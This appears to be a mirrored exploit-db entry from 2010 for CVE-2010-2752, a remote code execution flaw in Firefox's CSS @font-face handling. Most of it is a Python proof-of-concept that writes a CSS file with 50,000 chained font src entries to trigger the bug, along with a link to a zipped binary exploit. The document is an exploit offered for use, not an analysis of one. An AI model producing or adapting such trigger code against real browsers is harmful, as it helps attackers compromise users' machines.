Mozilla Firefox CSS – font-face Remote Code Execution

  • 作者: Abysssec
    日期: 2010-09-25
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/15104/
  • '''
    ________ __ ____
     |\/|/ __ \ /\| || |_ \ 
     | \/ | || | /\ | || | |_) |
     | |\/| | || |/ /\ \| || |_ < 
     | || | |__| / ____ \ |__| | |_) |
     |_||_|\____/_/\_\____/|____/ 
    
     http://www.exploit-db.com/moabu-15-mozilla-firefox-css-font-face-remote-code-execution-vulnerability/
     https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/15104.zip (moaub-25-exploit.zip)
     
    '''
    
    '''
    Title :Mozilla Firefox CSS font-face Remote Code Execution Vulnerability
    Version :Firefox
    Analysis:http://www.abysssec.com
    Vendor:http://www.mozilla.com
    Impact:Crirical
    Contact :shahin [at] abysssec.com , info[at] abysssec.com
    Twitter :@abysssec
    CVE :CVE-2010-2752
    
    '''
    
    import sys;
    
    myStyle = """
    @font-face {
    font-family: Sean;
    font-style:normal;
    font-weight: normal;
    src: url(SEAN1.eot);
    src: url('type/filename.woff') format('woff')
    
    """
    i=0
    while(i<50000):
    myStyle = myStyle + ",url('type/filename.otf') format('opentype')\n";
    i=i+1
    
    myStyle = myStyle + ",url('type/filename.otf') format('opentype');\n";
    myStyle = myStyle + "}\n";
    cssFile = open("style2.css","w")
    cssFile.write(myStyle)
    cssFile.close()